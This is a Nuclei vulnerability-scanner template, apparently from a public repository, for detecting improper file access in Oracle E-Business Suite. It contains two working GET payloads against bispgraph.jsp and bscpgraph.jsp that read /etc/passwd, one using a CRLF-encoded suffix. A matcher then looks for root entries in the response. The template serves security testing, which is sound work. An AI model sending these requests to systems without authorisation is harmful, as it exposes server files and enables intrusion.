Files
nuclei-templates/http/vulnerabilities/oracle/oracle-ebs-bispgraph-file-access.yaml
2024-12-01 13:57:55 +00:00

27 lines
1.1 KiB
YAML

id: oracle-ebs-bispgrapgh-file-read
info:
name: Oracle eBusiness Suite - Improper File Access
author: emenalf,tirtha_mandal,thomas_from_offensity
severity: critical
description: |
Oracle eBusiness Suite is susceptible to improper file access vulnerabilities via bispgrapgh. Be aware this product is no longer supported with patches or security fixes.
reference:
- https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4.pdf
- http://www.davidlitchfield.com/AssessingOraclee-BusinessSuite11i.pdf
metadata:
max-request: 2
tags: oracle,lfi
http:
- method: GET
path:
- "{{BaseURL}}/OA_HTML/bispgraph.jsp%0D%0A.js?ifn=passwd&ifl=/etc/"
- "{{BaseURL}}/OA_HTML/jsp/bsc/bscpgraph.jsp?ifl=/etc/&ifn=passwd"
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
# digest: 4a0a004730450221008f2ef11b35df3594b76a370de6674e761ccb2828176b65453d6251d05e46482a02201746983f76a279758ef2f9fe83a6356ac429b8256a7c57959870ad393bf08f6c:922c64590222798bb761d5b6d8e72950